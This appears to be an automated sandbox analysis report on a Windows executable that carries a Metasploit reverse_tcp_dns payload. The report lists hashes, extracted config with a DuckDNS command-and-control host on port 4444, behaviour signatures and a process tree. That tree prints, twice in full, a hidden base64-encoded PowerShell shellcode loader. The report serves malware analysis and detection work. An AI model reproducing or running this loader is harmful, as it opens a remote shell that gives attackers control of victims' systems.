Analysis

  • max time kernel
    31s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-09-2024 05:16

Errors

Reason
Machine shutdown

General

  • Target

    d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe

  • Size

    318KB

  • MD5

    d39fccd98f2225bba9db7ba4636ceef3

  • SHA1

    a333cbb04d50cc455c2084933b21bbb2ef370a4f

  • SHA256

    f2ca01177834859fa2f60bc1d060949ea88c15e38aa2de021f16dfdcea804724

  • SHA512

    e8d8c36f30f0072db21ed2a7c1e3cc4c0301b83d8348d1f474fac9e2228a1666c548da2bca1c8d539dac0cfaf09422659df3a62cb9b2e02876794773b132b0f3

  • SSDEEP

    6144:wtNb6TiU8liKNKCkC2Uus2czyD6FOWqxVyliAy7O6KLRvv7D:wtN+PznJTfc+mjpU/OtpD

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

hacker2386.duckdns.org:4444

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d39fccd98f2225bba9db7ba4636ceef3_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1484
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JAB3AHkAegBWACAAPQAgACcAJABvAFMAUwBaACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AUwBTAFoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4AGYAYQAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABmACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABhADIALAAwAHgAZgBkACwAMAB4ADQAMQAsADAAeAA3ADgALAAwAHgANABjACwAMAB4AGYAZQAsADAAeAA5ADEALAAwAHgAMQBkACwAMAB4AGMANQAsADAAeAAxAGIALAAwAHgAYQAwACwAMAB4ADEAZAAsADAAeABiADEALAAwAHgANgA4ACwAMAB4ADkAMwAsADAAeABhAGQALAAwAHgAYgAyACwAMAB4ADMAZAAsADAAeAAxADgALAAwAHgANAA1ACwAMAB4ADkANgAsADAAeABkADUALAAwAHgAYQBiACwAMAB4ADIAYgAsADAAeAAzAGUALAAwAHgAZAA5ACwAMAB4ADEAYwAsADAAeAA4ADEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeAA5AGQALAAwAHgAYgBhACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMQBlACwAMAB4AGMAMQAsADAAeAA4AGMALAAwAHgANQA3ACwAMAB4ADEAZgAsADAAeAAwAGEALAAwAHgAYwAxACwAMAB4ADkANgAsADAAeAA1ADgALAAwAHgANwA3ACwAMAB4ADIAYgAsADAAeABjAGEALAAwAHgAMwAxACwAMAB4AGYAMwAsADAAeAA5ADkALAAwAHgAZgBiACwAMAB4ADMANgAsADAAeAA0ADkALAAwAHgAMgAxACwAMAB4ADcANwAsADAAeAAwADQALAAwAHgANQBmACwAMAB4ADIAMQAsADAAeAA2ADQALAAwAHgAZABkACwAMAB4ADUAZQAsADAAeAAwADAALAAwAHgAMwBiACwAMAB4ADUANQAsADAAeAAzADkALAAwAHgAOAAyACwAMAB4AGIAZAAsADAAeABiAGEALAAwAHgAMwAxACwAMAB4ADgAYgAsADAAeABhADUALAAwAHgAZABmACwAMAB4ADcAYwAsADAAeAA0ADIALAAwAHgANQBkACwAMAB4ADIAYgAsADAAeAAwAGEALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAA2ADUALAAwAHgAZgAzACwAMAB4AGYAOQAsADAAeABmADYALAAwAHgANAA5ACwAMAB4ADAANgAsADAAeAAwADAALAAwAHgAMwBlACwAMAB4ADYAZAAsADAAeABmADkALAAwAHgANwA3ACwAMAB4ADMANgAsADAAeAA4AGQALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAA4AGQALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgAMQA2ACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAYgBjACwAMAB4AGYAMgAsADAAeAA2ADkALAAwAHgAZgA1ACwAMAB4ADUAYQAsADAAeAA3ADAALAAwAHgANgA1ACwAMAB4AGIAMgAsADAAeAAyADkALAAwAHgAZABlACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgBlACwAMAB4ADUANAAsADAAeAA5ADYALAAwAHgAYwBlACwAMAB4ADAAMQAsADAAeABiAGIALAAwAHgAMQBlACwAMAB4ADkANAAsADAAeAAyADUALAAwAHgAMQBmACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANAA0ACwAMAB4ADAANgAsADAAeAAyADYALAAwAHgAMgAxACwAMAB4ADcAOQAsADAAeAA1ADgALAAwAHgAOAA5ACwAMAB4ADkAZQAsADAAeABkAGYALAAwAHgAMQAyACwAMAB4ADIANAAsADAAeABjAGEALAAwAHgANQAyACwAMAB4ADcAOQAsADAAeAAyADEALAAwAHgAMwBmACwAMAB4ADUAZQAsADAAeAA4ADIALAAwAHgAYgAxACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAxACwAMAB4ADgAMwAsADAAeABmADgALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABhAGYALAAwAHgANwAxACwAMAB4ADQAZgAsADAAeAA1ADkALAAwAHgAYwBmACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgAZgA1ACwAMAB4ADIAZQAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4AGQAZgAsADAAeABmADQALAAwAHgAMAAwACwAMAB4ADEANwAsADAAeAA3ADcALAAwAHgAZABjACwAMAB4ADIAOAAsADAAeABmAGMALAAwAHgAOAA3ACwAMAB4AGUAMQAsADAAeABmAGMALAAwAHgANQAyACwAMAB4AGQAOAAsADAAeAA0AGQALAAwAHgAYQBmACwAMAB4ADEAMgAsADAAeAA4ADgALAAwAHgAMgBkACwAMAB4ADEAZgAsADAAeABmAGEALAAwAHgAYwAyACwAMAB4AGEAMQAsADAAeAA0ADAALAAwAHgAMQBhACwAMAB4AGUAZAAsADAAeAA2AGIALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4ADEANgAsADAAeABjADIALAAwAHgANAAyACwAMAB4AGYANQAsADAAeAA3ADUALAAwAHgAYQA5ACwAMAB4AGYANwAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADEAZQAsADAAeABjADAALAAwAHgANQAxACwAMAB4ADgAMgAsADAAeAAwADQALAAwAHgANAA1ACwAMAB4AGYAZAAsADAAeABiADEALAAwAHgAYQAwACwAMAB4AGMAYgAsADAAeAA3ADIALAAwAHgANgA4ACwAMAB4ADQANwAsADAAeAA2ADYALAAwAHgAMQAyACwAMAB4ADcANAAsADAAeABmAGYALAAwAHgAMgBmACwAMAB4AGYANAAsADAAeAA0ADAALAAwAHgANwBmACwAMAB4AGQAMAAsADAAeABkADAALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAAzADMALAAwAHgAYgAxACwAMAB4ADMAZQAsADAAeABlAGYALAAwAHgAMgAzACwAMAB4ADQANwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4AGUAOAAsADAAeABjAGUALAAwAHgAZAA5ACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgAOAA3ACwAMAB4ADcAMgAsADAAeABlADIALAAwAHgAYgA5ACwAMAB4ADgAMgAsADAAeAAwADkALAAwAHgAOQAzACwAMAB4ADQANgAsADAAeAAxADkALAAwAHgANwA0ACwAMAB4ADkAMwAsADAAeABjAGQALAAwAHgAYQBlACwAMAB4ADgAOAAsADAAeAA1AGQALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA5AGEALAAwAHgAMAA5ACwAMAB4AGMANgAsADAAeAA5ADEALAAwAHgAYwAxACwAMAB4ADkAZgAsADAAeABkADkALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeAAxAGYALAAwAHgANABjACwAMAB4AGIANAAsADAAeAAyADYALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeABiADYALAAwAHgAMQBmACwAMAB4AGIAZQAsADAAeABhADcALAAwAHgANAA5ACwAMAB4ADQAYQAsADAAeABiADUALAAwAHgANgBlACwAMAB4AGQAYwAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAZQAsADAAeAAzADAALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeABkADkALAAwAHgANQBhACwAMAB4AGIANgAsADAAeAA1ADkALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeABlADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABlAGEALAAwAHgAOQA5ACwAMAB4ADIAZAAsADAAeAA1ADcALAAwAHgAMQA1ACwAMAB4AGMAOAAsADAAeAA4ADIALAAwAHgAZgAwACwAMAB4ADcAZAAsADAAeABmADYALAAwAHgAZgBkACwAMAB4ADMANwAsADAAeAAyADIALAAwAHgAMAA5ACwAMAB4ADIAOAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4AGQAYwAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4ADQAZQAsADAAeABkAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADIASwBLAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAAyAEsASwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAMgBLAEsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB3AHkAegBWACkAKQA7ACQANwBxADEAWAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGIAWgBMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAWgBMACAAJAA3AHEAMQBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADcAcQAxAFgAIAAkAGUAIgA7AH0A
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JAB3AHkAegBWACAAPQAgACcAJABvAFMAUwBaACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG8AUwBTAFoAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4ADUANwAsADAAeAAwADEALAAwAHgAYQA5ACwAMAB4AGYAYQAsADAAeABkADkALAAwAHgAZQA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABmACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA1AGEALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABhADIALAAwAHgAZgBkACwAMAB4ADQAMQAsADAAeAA3ADgALAAwAHgANABjACwAMAB4AGYAZQAsADAAeAA5ADEALAAwAHgAMQBkACwAMAB4AGMANQAsADAAeAAxAGIALAAwAHgAYQAwACwAMAB4ADEAZAAsADAAeABiADEALAAwAHgANgA4ACwAMAB4ADkAMwAsADAAeABhAGQALAAwAHgAYgAyACwAMAB4ADMAZAAsADAAeAAxADgALAAwAHgANAA1ACwAMAB4ADkANgAsADAAeABkADUALAAwAHgAYQBiACwAMAB4ADIAYgAsADAAeAAzAGUALAAwAHgAZAA5ACwAMAB4ADEAYwAsADAAeAA4ADEALAAwAHgAMQA4ACwAMAB4AGQANAAsADAAeAA5AGQALAAwAHgAYgBhACwAMAB4ADUAOAAsADAAeAA3ADcALAAwAHgAMQBlACwAMAB4AGMAMQAsADAAeAA4AGMALAAwAHgANQA3ACwAMAB4ADEAZgAsADAAeAAwAGEALAAwAHgAYwAxACwAMAB4ADkANgAsADAAeAA1ADgALAAwAHgANwA3ACwAMAB4ADIAYgAsADAAeABjAGEALAAwAHgAMwAxACwAMAB4AGYAMwAsADAAeAA5ADkALAAwAHgAZgBiACwAMAB4ADMANgAsADAAeAA0ADkALAAwAHgAMgAxACwAMAB4ADcANwAsADAAeAAwADQALAAwAHgANQBmACwAMAB4ADIAMQAsADAAeAA2ADQALAAwAHgAZABkACwAMAB4ADUAZQAsADAAeAAwADAALAAwAHgAMwBiACwAMAB4ADUANQAsADAAeAAzADkALAAwAHgAOAAyACwAMAB4AGIAZAAsADAAeABiAGEALAAwAHgAMwAxACwAMAB4ADgAYgAsADAAeABhADUALAAwAHgAZABmACwAMAB4ADcAYwAsADAAeAA0ADIALAAwAHgANQBkACwAMAB4ADIAYgAsADAAeAAwAGEALAAwAHgANQA1ACwAMAB4AGIANwAsADAAeAA2ADUALAAwAHgAZgAzACwAMAB4AGYAOQAsADAAeABmADYALAAwAHgANAA5ACwAMAB4ADAANgAsADAAeAAwADAALAAwAHgAMwBlACwAMAB4ADYAZAAsADAAeABmADkALAAwAHgANwA3ACwAMAB4ADMANgAsADAAeAA4AGQALAAwAHgAOAA0ACwAMAB4ADgAZgAsADAAeAA4AGQALAAwAHgAZQBmACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgAMQA2ACwAMAB4ADUANwAsADAAeAAxADAALAAwAHgAYgBjACwAMAB4AGYAMgAsADAAeAA2ADkALAAwAHgAZgA1ACwAMAB4ADUAYQAsADAAeAA3ADAALAAwAHgANgA1ACwAMAB4AGIAMgAsADAAeAAyADkALAAwAHgAZABlACwAMAB4ADYAYQAsADAAeAA0ADUALAAwAHgAZgBlACwAMAB4ADUANAAsADAAeAA5ADYALAAwAHgAYwBlACwAMAB4ADAAMQAsADAAeABiAGIALAAwAHgAMQBlACwAMAB4ADkANAAsADAAeAAyADUALAAwAHgAMQBmACwAMAB4ADcAYQAsADAAeAA0AGUALAAwAHgANAA0ACwAMAB4ADAANgAsADAAeAAyADYALAAwAHgAMgAxACwAMAB4ADcAOQAsADAAeAA1ADgALAAwAHgAOAA5ACwAMAB4ADkAZQAsADAAeABkAGYALAAwAHgAMQAyACwAMAB4ADIANAAsADAAeABjAGEALAAwAHgANQAyACwAMAB4ADcAOQAsADAAeAAyADEALAAwAHgAMwBmACwAMAB4ADUAZQAsADAAeAA4ADIALAAwAHgAYgAxACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAZgAxACwAMAB4ADgAMwAsADAAeABmADgALAAwAHgANAAxACwAMAB4ADkAZQAsADAAeABhAGYALAAwAHgANwAxACwAMAB4ADQAZgAsADAAeAA1ADkALAAwAHgAYwBmACwAMAB4AGEAYgAsADAAeAAzADcALAAwAHgAZgA1ACwAMAB4ADIAZQAsADAAeAA1ADQALAAwAHgANAA3ACwAMAB4AGQAZgAsADAAeABmADQALAAwAHgAMAAwACwAMAB4ADEANwAsADAAeAA3ADcALAAwAHgAZABjACwAMAB4ADIAOAAsADAAeABmAGMALAAwAHgAOAA3ACwAMAB4AGUAMQAsADAAeABmAGMALAAwAHgANQAyACwAMAB4AGQAOAAsADAAeAA0AGQALAAwAHgAYQBmACwAMAB4ADEAMgAsADAAeAA4ADgALAAwAHgAMgBkACwAMAB4ADEAZgAsADAAeABmAGEALAAwAHgAYwAyACwAMAB4AGEAMQAsADAAeAA0ADAALAAwAHgAMQBhACwAMAB4AGUAZAAsADAAeAA2AGIALAAwAHgAZQA5ACwAMAB4ADMAMgAsADAAeAAwADUALAAwAHgAOQA0ACwAMAB4ADEANgAsADAAeABjADIALAAwAHgANAAyACwAMAB4AGYANQAsADAAeAA3ADUALAAwAHgAYQA5ACwAMAB4AGYANwAsADAAeAA4ADcALAAwAHgANABiACwAMAB4ADEAZQAsADAAeABjADAALAAwAHgANQAxACwAMAB4ADgAMgAsADAAeAAwADQALAAwAHgANAA1ACwAMAB4AGYAZAAsADAAeABiADEALAAwAHgAYQAwACwAMAB4AGMAYgAsADAAeAA3ADIALAAwAHgANgA4ACwAMAB4ADQANwAsADAAeAA2ADYALAAwAHgAMQAyACwAMAB4ADcANAAsADAAeABmAGYALAAwAHgAMgBmACwAMAB4AGYANAAsADAAeAA0ADAALAAwAHgANwBmACwAMAB4AGQAMAAsADAAeABkADAALAAwAHgAMgAyACwAMAB4ADMAZgAsADAAeAAzADMALAAwAHgAYgAxACwAMAB4ADMAZQAsADAAeABlAGYALAAwAHgAMgAzACwAMAB4ADQANwAsADAAeAAzAGYALAAwAHgAMQBlACwAMAB4AGUAOAAsADAAeABjAGUALAAwAHgAZAA5ACwAMAB4ADQAYQAsADAAeAAwADAALAAwAHgAOAA3ACwAMAB4ADcAMgAsADAAeABlADIALAAwAHgAYgA5ACwAMAB4ADgAMgAsADAAeAAwADkALAAwAHgAOQAzACwAMAB4ADQANgAsADAAeAAxADkALAAwAHgANwA0ACwAMAB4ADkAMwAsADAAeABjAGQALAAwAHgAYQBlACwAMAB4ADgAOAAsADAAeAA1AGQALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA5AGEALAAwAHgAMAA5ACwAMAB4AGMANgAsADAAeAA5ADEALAAwAHgAYwAxACwAMAB4ADkAZgAsADAAeABkADkALAAwAHgAMABmACwAMAB4ADYAZgAsADAAeAAxAGYALAAwAHgANABjACwAMAB4AGIANAAsADAAeAAyADYALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeABiADYALAAwAHgAMQBmACwAMAB4AGIAZQAsADAAeABhADcALAAwAHgANAA5ACwAMAB4ADQAYQAsADAAeABiADUALAAwAHgANgBlACwAMAB4AGQAYwAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAZQAsADAAeAAzADAALAAwAHgAYgA2ACwAMAB4ADMAMQAsADAAeABkADkALAAwAHgANQBhACwAMAB4AGIANgAsADAAeAA1ADkALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeABlADUALAAwAHgANwBjACwAMAB4AGMAMgAsADAAeABlAGEALAAwAHgAOQA5ACwAMAB4ADIAZAAsADAAeAA1ADcALAAwAHgAMQA1ACwAMAB4AGMAOAAsADAAeAA4ADIALAAwAHgAZgAwACwAMAB4ADcAZAAsADAAeABmADYALAAwAHgAZgBkACwAMAB4ADMANwAsADAAeAAyADIALAAwAHgAMAA5ACwAMAB4ADIAOAAsADAAeABjADYALAAwAHgAMQBlACwAMAB4AGQAYwAsADAAeAAxADQALAAwAHgAYgBjACwAMAB4ADQAZQAsADAAeABkAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkADIASwBLAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAAyAEsASwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAMgBLAEsALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB3AHkAegBWACkAKQA7ACQANwBxADEAWAAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGIAWgBMACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGIAWgBMACAAJAA3AHEAMQBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADcAcQAxAFgAIAAkAGUAIgA7AH0A
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3236
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
